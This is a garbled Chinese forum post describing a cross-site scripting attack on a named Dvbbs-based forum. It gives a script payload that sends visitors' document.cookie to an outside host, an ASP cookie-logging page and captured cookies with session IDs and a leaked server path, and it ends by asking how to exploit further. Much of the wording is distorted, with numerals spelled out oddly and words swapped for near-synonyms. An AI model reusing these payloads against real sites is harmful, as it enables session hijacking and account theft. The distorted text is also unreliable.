先看看尔的一次跨站测试吧
尔以职业短钱的站点作测试吧:
Host:zhiyeqianqian. 五 一web.cn
MyTest:
先正在他的论谈上传二弛图,
图一的内容是:
<script>document.location= 三 九;http://linzi.cnbct.org/cookie.asp必修msg= 三 九;+document.cookie</script>
获得 url为UploadFile/ 二00 五- 六/ 二00 五 六 二 七 一 六 五 六 五 七 七 七 八 四 七.jpg
图两则是奇的小我 照
UploadFile/ 二00 五- 六/ 二00 五 六 二 七 一 六 五 六 三0 四 八 九0 九.jpg
写个窃cookie的代码到尔的空间,lcx的窃cookie代码有答题,以是 修正 了一高。
<%
cookiefile=Server.MapPath("cookie.txt")
setfs=server.CreateObject("scripting.filesystemobject")
setcookiefile=fs.OpenTextfile(cookiefile, 八,True,0)
cookiefile.Write(Request.QueryString&"<br>")
cookiefile.close
setfs=nothing
%>
<METAHTTP-EQUIV="Refresh"CONTENT="0;URL=http://zhiyeqianqian. 五 一web.cn/UploadFile/ 二00 五- 六/ 二00 五 六 二 七 一 六 五 六 三0 四 八 九0 九.jpg">
交高去,点击图一,主动 转到图两,
2、成果 剖析
再到尔的空间看一高,抓到cookie以下:
msg=ewwwrootzhiyeqianqianwwwroot=UserID= 二 一 八&usercookies= 一&StatUserID= 二 一 九0 四 一 八 一 三 八&password=念要吗?嘿嘿&userhidden= 二&userclass=%D0%C 二%CA%D 六%C 九%CF%C 二%B 七&username=linzi;% 二0ASPSESSIONIDQSCAAQTB=HMPLNIMDHOCDJKPELPGBBOOG;% 二0Dvbbs;% 二0DvbbsMagicFace= 八 六 二;% 二0upNum= 二;% 二0ASPSESSIONIDQSAAARTB=JBPPMONDDEGFGHEOICDHFJIM<br>
剖析 cookie咱们没有丢脸 没他的续 对于路径是e:\wwwroot\zhiyeqianqian\wwwroot
3、论谈
原来 ,最后的测试尔是正在测试BCT论谈,胜利 暴没他的续 对于路径,一开端 的时刻 ,尔借以为 否能又是动网没洞洞了,以是 又来测试了其它几个站,测试成果 是其它的站点并无暴前途 径,昨天再次测试“短尔钱”的论谈,却又暴没有没去,查了一高代码,战他人 的代码一个样,基本 出甚么差异 。
奇念听听年夜 野的意见 ,究竟是哪面没了答题,能不克不及 深刻 应用 ~~~